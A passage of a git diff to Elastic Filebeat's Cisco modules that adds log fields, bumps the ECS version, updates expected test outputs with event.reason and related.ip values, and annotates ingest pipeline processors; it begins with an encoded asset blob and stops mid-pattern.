KjDRO53GikS0rYghH7m7NQnaDPkx1eEEuew7fNuUHPoSMsFaR9hiB0+aLDLVQJeMff0CUmW/RR7za+bSKwRb+QNnp2rV1hAoN95LXvmlqACtSqwSGzL+KA400fgED1/06lKZTzDNm3S3Z6hXqsO69TrwMUA4XBg+a/cwKx0+T1jpHqM3y9672WdVdA+ngX0CE10zjsmoDB7t60CZluGwY7FG5Icbj4GcoGYo4EHK1wA5JzumDC++pBOEFXvwKXI00HAbuTCsUS4dY6YHrqX2zB2PhsU9PueymN9KZsfNjGYLIqJm6B364KDEcD66i7HUmGvMyZiDdBLOrdsCRDUWHaxzMgpLplO7Atro12W94fmNo5wDrt23cA6xKr+kzZH5+1pGxWbNBKHdnbYW1Zl/x+FHkm+swS19ZCqm26Df8XXWLxbwc7xtSI7HZRr9Xz0NNk2fIvLwH6AdoeTSUaUFX3W99P1egpyKgwSpaniI5cVvOBc+GoM+7XtNY2PVCOADi66o5p7+GFLEosts19hGsH4/SdvbKmyj5DGRMLGVYKsP6cukbogPzoWZE1Zhuativ64kuqHIFfKs636D8qzNmC0RxdQt2zcw4GUdnQeUak/MweKej+O50jt35rP2M+ps1H7zbbhsPLyoDKfeII08N3/X2zhJ+y493Rzic/Qx+2pSO99RxY5rgdHN88RRdZ1GayPbQtDs4RoZ7pUNvaPjJTuOoa5XIXO+dZLKWqvf0QYn7/ZmTLO71yIh+nmhdl2jlEe1hhVz7oua/RVFIm0kR2kbLr2P1AJTZh1yQRGdYxo/0dwMqX00eGXCkecZs7UCPuSmOMZpWK5Q3pwNRUZXgZz6ZsQUd/nnZBR01/3AXtT30CwULvDBWgWsU3Tiz8aKe5UfRWivZSZWJrVG6JKWoJd2TuB1gW1KuX/t8XHoWX/h8+rynk9secqnB2nifnEaPnjphu8Bw8rp1RawNycj8QzZpUTCyoUiNx1yHdk9DVVfwPsj7onp0Aybov8aKzDYErBWFtmfRKBZaY7Phdubi9PXYfIINYdX/0VzpM0Bof+MnKFVXT+COszu4znp5fwOjHF+gC1g+jRpWZqFnKCJ8vqPLDP+lOFuae5rw0aei4w8jOhttFn+lOp+i9O83+ONUref/WKOHdRrfsj7C3hn1OJFOu/3qFBF1Kw9wGliusRyZAaTJ1W6HOVrrFx4cL2q1ONgFqkODSO2N14/S6/iackKLZcoqKit3+Rs3Uww+jg5atNGFaV9GVToAMyVLpvHUPi6EAhlSppD7QwaZ0peeVXRzdQnB6n3SaJEOi6Qzuo8jPbyG1c/9j1JGepyF5f+m5B8dxEao1z9YpX/R+SNU7soPI5Jk9eriK3qZRpwLMPlNvUSdqbvBNO66k+yCBbP0RaYjXSYWub8//+vYG3dh3Cv0mRqavtNgmqqQ+BdsPGxnGFsQQWVHyWZ/kRD5OCKftQRYaOtf062xahEEaqB9B2ErBPVouVWzQFPIRlFyHR9MVZNRoAJz/P+6upbdxGwjf+yt4TAA3Afq6dFHAzXa7ATat0TbYozCmaJswRQokZTn/vuDwYT1ot2hkpdhrAlMfZ4bDITnfjAXbzNbhs4vyAIKX3hAzIIaOcLaq1pccIUpsz17M0G1PZPkxgXTisXfW1qbg2IP2KkOjKq8hEAr/g9XEtzIyX5Tm9uUfVhRVVXXVOnH/ErfHES6E8hT8lmsmhifNqa9YWgGyMOatGt66L3sf/jnMNnK0smg91bioFZ8jrToH2CMgiABB5U8DKFa6AylHhTOuXW4qfBWBnHmznalsc9pYQs/Dz5+Wv4V9737w+bShWKWHd/+T12zjZl8clGiuJYBl7OMsQ5+b1Bk7tvNtJLeG3HgQ5hardSCxN3bUHQxPEHR2NqK5kjf7FLA+S25DusBdn3RwYBozBTaNIFRJymrrDsp/eh2eKa/Qttf0vl7w7sAeW2g7oLXSlign348/L3MpuFmxT213Sm/nT7AcEgx6V6xr8MVOsoVifv3l99XjijzBseKyTG2982p1c5s9DbPXRPHMtMI0RrO7NK0UPuUpi5OnZ3uWY7GZj7D51iT8OOWrhx29y7LglR/fhyq9AcVFhGI+pbxxrYA44+qL5w0nYo4sx5Hk1Ksb70vcEfqNshtDu2o8xadH3cqTexfENJkUdTDknbFaye1PawF0L7ixrHx3H/62SP/lcsNo/l8brlkLIhvIwFp0fkNAlsQocsYsNdtyY/WLO9nP6SxqsLtQrD9hIEMMI5B4KTUXTE+E9nwtqnSnCnmKJxNyJm0nJ+V0426oumuqtWZCdE/zeUvv4emn33/AJYAr9sENSp7DoN2NdbxOBuXm+ODEcl44F6AQspQEtIaUf1/yDdJYbec7RDOBbz1Bx8hrzUUB4cJxImh/YfYKbfxVhfbsulPLCB657MO4rQJLd8xkg1clOH0p4ovh+GHwFVCxOFB6jPSVKTyUVGKQm1iB5I4sD8AFvpOdsu/Jt7jCYa0O2Sirh3syGdtQ9e0E3Um1gjIUO4iIPyhN2BGqWrAF+UNBxeUWeQWNxbJQsaNqDvlaKLpnZTG9hQytQSO9/kTC7lrGmjnIAcsZFXx3WQXBCCe1nKiAFrPrcfyF+2NIMLfsaO93thI5PGYHhdnBN9//MAWaj+xISr5lxkZ/0K/6kF/2cChKZn3338n0mkYMVwOUKt3pCkNAWn7gujGEyS2XpwYryGzh0tT+51k30MA0zpO4/R4v5YQgtXIC4p4UIFuQzgo71YjIzep5eRsM1KTnmlqrI3cRnMMNzkPYRssOrS9N1FCQst++N6mgqouSm1oZPopaX+N+8T2jyzo0CS/GIogIofqtbFkeAEsgPIFoXfC90irq8Wb5tLp1M6xBJ/uKe59vCvOY1EY2DDMofiQU3MIlD4KBXLhxOeWqwb38We6larMqdgKpPIbx/d1/lMjj5vT5xaiVWvha31KXT6tz6AxVejIXgoMNkWAOqEPgAyIMKRI33ce6kb/ilNlyIZyk1wJk1omXYIGyUVuAV8Duyi9ZwnuwQB7wO96lBzJg4IE2humvka/vYxINmw2nOby+g+Hw5PwKuOFUnDbK9BTte3XbRkom7r76OwAA//8VqLns" } diff --git a/x-pack/filebeat/module/cisco/ftd/_meta/fields.yml b/x-pack/filebeat/module/cisco/ftd/_meta/fields.yml index 7c31ecd11ff..88f1d922df1 100644 --- a/x-pack/filebeat/module/cisco/ftd/_meta/fields.yml +++ b/x-pack/filebeat/module/cisco/ftd/_meta/fields.yml @@ -114,3 +114,15 @@ default_field: false description: > The assigned DAP records + + - name: termination_user + type: keyword + default_field: false + description: > + AAA name of user requesting termination + + - name: webvpn.group_name + type: keyword + default_field: false + description: > + The WebVPN group name the user belongs to diff --git a/x-pack/filebeat/module/cisco/ftd/config/input.yml b/x-pack/filebeat/module/cisco/ftd/config/input.yml index ebf27d1b115..6635c2800b8 100644 --- a/x-pack/filebeat/module/cisco/ftd/config/input.yml +++ b/x-pack/filebeat/module/cisco/ftd/config/input.yml @@ -22,7 +22,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 {{ if .external_zones }} - add_fields: diff --git a/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json index cbb36cb6185..ca827be6c56 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/asa-fix.log-expected.json @@ -6,6 +6,7 @@ "cisco.ftd.message_id": "302016", "cisco.ftd.source_interface": "Outside", "cisco.ftd.source_username": "(LOCAL\\Elastic)", + "cisco.ftd.termination_user": "zzzzzz", "destination.address": "10.233.123.123", "destination.ip": "10.233.123.123", "destination.port": 53, diff --git a/x-pack/filebeat/module/cisco/ftd/test/asa.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/asa.log-expected.json index 70e87e332d9..475389976c6 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/asa.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/asa.log-expected.json @@ -131,6 +131,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -190,6 +191,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -249,6 +251,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -308,6 +311,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -367,6 +371,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:48.000Z", "event.timezone": "-02:00", @@ -426,6 +431,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:48.000Z", "event.timezone": "-02:00", @@ -485,6 +491,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:48.000Z", "event.timezone": "-02:00", @@ -544,6 +551,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -603,6 +611,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -662,6 +671,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -721,6 +731,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -780,6 +791,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:47.000Z", "event.timezone": "-02:00", @@ -839,6 +851,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:46.000Z", "event.timezone": "-02:00", @@ -898,6 +911,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:49.000Z", "event.timezone": "-02:00", @@ -957,6 +971,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:46.000Z", "event.timezone": "-02:00", @@ -1016,6 +1031,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:33:45.000Z", "event.timezone": "-02:00", @@ -1075,6 +1091,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11753 for outside:100.66.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout", + "event.reason": "SYN Timeout", "event.severity": 6, "event.start": "2018-10-10T14:34:26.000Z", "event.timezone": "-02:00", @@ -2744,6 +2761,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-10-10T14:34:56.000Z", "event.timezone": "-02:00", @@ -3717,6 +3735,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-10-10T14:34:56.000Z", "event.timezone": "-02:00", @@ -4430,6 +4449,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-10-10T14:29:31.000Z", "event.timezone": "-02:00", @@ -4489,6 +4509,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", + "event.reason": "TCP Reset-I", "event.severity": 6, "event.start": "2018-10-10T14:34:56.000Z", "event.timezone": "-02:00", diff --git a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json index d416dcb068c..0e0512e1c3a 100644 --- a/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json +++ b/x-pack/filebeat/module/cisco/ftd/test/sample.log-expected.json @@ -442,6 +442,7 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.222", + "192.0.2.43", "10.123.1.35" ], "service.type": "cisco", @@ -543,7 +544,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.2.1", - "10.123.3.42" + "10.123.3.42", + "10.123.3.130" ], "service.type": "cisco", "source.address": "192.0.2.1", @@ -796,7 +798,8 @@ "observer.vendor": "Cisco", "related.ip": [ "192.0.0.17", - "192.168.3.42" + "192.168.3.42", + "10.0.0.130" ], "service.type": "cisco", "source.address": "192.0.0.17", @@ -2226,6 +2229,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%FTD-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-11T10:01:31.000Z", "event.timezone": "-02:00", @@ -2283,6 +2287,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-11T10:00:30.000Z", "event.timezone": "-02:00", @@ -2340,6 +2345,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-11T10:00:30.000Z", "event.timezone": "-02:00", @@ -2663,6 +2669,7 @@ "event.kind": "event", "event.module": "cisco", "event.original": "%FTD-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", + "event.reason": "TCP FINs", "event.severity": 6, "event.start": "2018-12-10T10:01:54.000Z", "event.timezone": "-02:00", @@ -3321,6 +3328,7 @@ ], "related.ip": [ "10.1.1.45", + "192.88.99.1", "192.88.99.129" ], "server.domain": "bad.example.com", @@ -3379,7 +3387,9 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", - "192.0.2.223" + "10.2.1.1", + "192.0.2.223", + "192.0.2.225" ], "service.type": "cisco", "source.address": "10.1.1.1", @@ -3436,6 +3446,7 @@ "observer.vendor": "Cisco", "related.ip": [ "10.1.1.1", + "10.2.1.1", "192.0.2.223" ], "service.type": "cisco", diff --git a/x-pack/filebeat/module/cisco/ios/config/input.yml b/x-pack/filebeat/module/cisco/ios/config/input.yml index 52431a66183..c82ad9e2b5d 100644 --- a/x-pack/filebeat/module/cisco/ios/config/input.yml +++ b/x-pack/filebeat/module/cisco/ios/config/input.yml @@ -23,7 +23,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: cisco_ios diff --git a/x-pack/filebeat/module/cisco/meraki/config/input.yml b/x-pack/filebeat/module/cisco/meraki/config/input.yml index fe55241042b..581a3588720 100644 --- a/x-pack/filebeat/module/cisco/meraki/config/input.yml +++ b/x-pack/filebeat/module/cisco/meraki/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/cisco/meraki/test/generated.log-expected.json b/x-pack/filebeat/module/cisco/meraki/test/generated.log-expected.json index 93b1c694ae6..bde70c5a004 100644 --- a/x-pack/filebeat/module/cisco/meraki/test/generated.log-expected.json +++ b/x-pack/filebeat/module/cisco/meraki/test/generated.log-expected.json @@ -354,8 +354,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.210.213.18", - "10.134.0.141" + "10.134.0.141", + "10.210.213.18" ], "rsa.internal.event_desc": "atquovosecurity_event iumto", "rsa.internal.messageid": "security_event", @@ -531,8 +531,8 @@ "appliance" ], "related.ip": [ - "10.53.150.119", - "10.85.10.165" + "10.85.10.165", + "10.53.150.119" ], "rsa.internal.messageid": "events", "rsa.misc.event_source": "appliance", @@ -569,8 +569,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.187.77.245", - "10.88.231.224" + "10.88.231.224", + "10.187.77.245" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -753,8 +753,8 @@ "appliance" ], "related.ip": [ - "10.153.0.77", - "10.163.154.210" + "10.163.154.210", + "10.153.0.77" ], "rsa.counters.dclass_r1": "utlabor", "rsa.internal.messageid": "events", @@ -855,8 +855,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.12.182.70", - "10.31.77.157" + "10.31.77.157", + "10.12.182.70" ], "rsa.internal.event_desc": "uiac security_event epte", "rsa.internal.messageid": "security_event", @@ -993,8 +993,8 @@ "appliance" ], "related.ip": [ - "10.66.89.5", - "10.247.30.212" + "10.247.30.212", + "10.66.89.5" ], "rsa.internal.messageid": "flows", "rsa.misc.action": [ @@ -1058,8 +1058,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.173.136.186", - "10.221.102.245" + "10.221.102.245", + "10.173.136.186" ], "rsa.internal.event_desc": "idestlab", "rsa.internal.messageid": "security_event", @@ -1097,8 +1097,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.54.37.86", - "10.58.64.108" + "10.58.64.108", + "10.54.37.86" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -1136,8 +1136,8 @@ "appliance" ], "related.ip": [ - "10.147.76.202", - "10.163.93.20" + "10.163.93.20", + "10.147.76.202" ], "rsa.internal.messageid": "flows", "rsa.misc.action": [ @@ -1178,8 +1178,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.0.200.27", - "10.183.44.198" + "10.183.44.198", + "10.0.200.27" ], "rsa.internal.event_desc": "uradi security_event tot", "rsa.internal.messageid": "security_event", @@ -1216,8 +1216,8 @@ "appliance" ], "related.ip": [ - "10.28.144.180", - "10.148.124.84" + "10.148.124.84", + "10.28.144.180" ], "rsa.internal.messageid": "events", "rsa.misc.event_source": "appliance", @@ -1391,8 +1391,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.180.195.43", - "10.247.139.239" + "10.247.139.239", + "10.180.195.43" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -1781,8 +1781,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.196.96.162", - "10.81.234.34" + "10.81.234.34", + "10.196.96.162" ], "rsa.internal.event_desc": "Utenima security_event iqua", "rsa.internal.messageid": "security_event", @@ -1844,8 +1844,8 @@ "remips188.api.invalid" ], "related.ip": [ - "10.40.101.224", - "10.78.199.43" + "10.78.199.43", + "10.40.101.224" ], "rsa.internal.messageid": "events", "rsa.misc.event_source": "appliance", @@ -1919,8 +1919,8 @@ "appliance" ], "related.ip": [ - "10.39.172.93", - "10.83.131.245" + "10.83.131.245", + "10.39.172.93" ], "rsa.internal.messageid": "flows", "rsa.misc.action": [ @@ -1996,8 +1996,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.148.211.222", - "10.122.204.151" + "10.122.204.151", + "10.148.211.222" ], "rsa.internal.event_desc": "umexercisecurity_event duntut", "rsa.internal.messageid": "security_event", @@ -2143,8 +2143,8 @@ "uames4985.mail.localdomain" ], "related.ip": [ - "10.150.163.151", - "10.144.57.239" + "10.144.57.239", + "10.150.163.151" ], "rsa.internal.messageid": "events", "rsa.misc.event_source": "appliance", @@ -2185,8 +2185,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.52.202.158", - "10.54.44.231" + "10.54.44.231", + "10.52.202.158" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -2360,8 +2360,8 @@ "appliance" ], "related.ip": [ - "10.158.61.228", - "10.132.176.96" + "10.132.176.96", + "10.158.61.228" ], "rsa.counters.dclass_r1": "eserun", "rsa.internal.messageid": "events", @@ -2402,8 +2402,8 @@ "lors2232.api.example" ], "related.ip": [ - "10.46.217.155", - "10.105.136.146" + "10.105.136.146", + "10.46.217.155" ], "rsa.internal.messageid": "events", "rsa.misc.event_source": "appliance", @@ -2446,8 +2446,8 @@ "appliance" ], "related.ip": [ - "10.123.62.215", - "10.245.199.23" + "10.245.199.23", + "10.123.62.215" ], "rsa.db.index": "iusmodt", "rsa.internal.messageid": "flows", @@ -2558,8 +2558,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.34.62.190", - "10.246.152.72" + "10.246.152.72", + "10.34.62.190" ], "rsa.internal.event_desc": "Nem", "rsa.internal.messageid": "security_event", @@ -2671,8 +2671,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.121.9.5", - "10.244.32.189" + "10.244.32.189", + "10.121.9.5" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -2797,8 +2797,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.199.19.205", - "10.103.91.159" + "10.103.91.159", + "10.199.19.205" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -2839,8 +2839,8 @@ "appliance" ], "related.ip": [ - "10.17.111.91", - "10.65.0.157" + "10.65.0.157", + "10.17.111.91" ], "rsa.db.index": "nostrum", "rsa.internal.messageid": "flows", @@ -2939,8 +2939,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.177.64.152", - "10.140.242.86" + "10.140.242.86", + "10.177.64.152" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -3236,8 +3236,8 @@ "observer.type": "Wireless", "observer.vendor": "Cisco", "related.ip": [ - "10.147.165.30", - "10.195.90.73" + "10.195.90.73", + "10.147.165.30" ], "rsa.internal.messageid": "ids-alerts", "rsa.misc.event_type": "ids-alerts", @@ -3426,8 +3426,8 @@ "appliance" ], "related.ip": [ - "10.75.122.111", - "10.85.59.172" + "10.85.59.172", + "10.75.122.111" ], "rsa.counters.dclass_r1": "sequat", "rsa.internal.messageid": "events", diff --git a/x-pack/filebeat/module/cisco/nexus/config/input.yml b/x-pack/filebeat/module/cisco/nexus/config/input.yml index b17aa083854..8bd0a36a42b 100644 --- a/x-pack/filebeat/module/cisco/nexus/config/input.yml +++ b/x-pack/filebeat/module/cisco/nexus/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml index b76b7a69a20..7cd61253320 100644 --- a/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml +++ b/x-pack/filebeat/module/cisco/shared/ingest/asa-ftd-pipeline.yml @@ -183,97 +183,120 @@ processors: - dissect: if: "ctx._temp_.cisco.message_id == '106001'" field: "message" + description: "106001" pattern: "%{network.direction} %{network.transport} connection %{event.outcome} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} flags %{} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '106002'" field: "message" + description: "106002" pattern: "%{network.transport} Connection %{event.outcome} by %{network.direction} list %{_temp_.cisco.list_id} src %{source.address} dest %{destination.address}" - dissect: if: "ctx._temp_.cisco.message_id == '106006'" field: "message" + description: "106006" pattern: "%{event.outcome} %{network.direction} %{network.transport} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '106007'" field: "message" + description: "106007" pattern: "%{event.outcome} %{network.direction} %{network.transport} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} due to %{network.protocol} %{}" - grok: if: "ctx._temp_.cisco.message_id == '106010'" field: "message" + description: "106010" patterns: - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.direction} %{NOTSPACE:network.transport} src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address}/%{POSINT:source.port} (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{POSINT:destination.port}(%{GREEDYDATA})?" - dissect: if: "ctx._temp_.cisco.message_id == '106013'" field: "message" + description: "106013" pattern: "Dropping echo request from %{source.address} to PAT address %{destination.address}" - set: if: "ctx._temp_.cisco.message_id == '106013'" field: "network.transport" + description: "106013" value: icmp - set: if: "ctx._temp_.cisco.message_id == '106013'" field: "network.direction" + description: "106013" value: inbound - grok: if: "ctx._temp_.cisco.message_id == '106014'" field: "message" + description: "106014" patterns: - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.direction} %{NOTSPACE:network.transport} src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address} (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}(%{GREEDYDATA})?" - grok: if: "ctx._temp_.cisco.message_id == '106015'" field: "message" + description: "106015" patterns: - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.transport} %{NOTSPACE} from %{IP:source.address}/%{POSINT:source.port} to %{IP:destination.address}/%{POSINT:destination.port} flags %{DATA} on interface %{NOTSPACE:_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '106016'" field: "message" pattern: "%{event.outcome} IP spoof from (%{source.address}) to %{destination.address} on interface %{_temp_.cisco.source_interface}" + description: "106016" - dissect: if: "ctx._temp_.cisco.message_id == '106017'" field: "message" pattern: "%{event.outcome} IP due to Land Attack from %{source.address} to %{destination.address}" + description: "106017" - dissect: if: "ctx._temp_.cisco.message_id == '106018'" field: "message" pattern: "%{network.transport} packet type %{_temp_.cisco.icmp_type} %{event.outcome} by %{network.direction} list 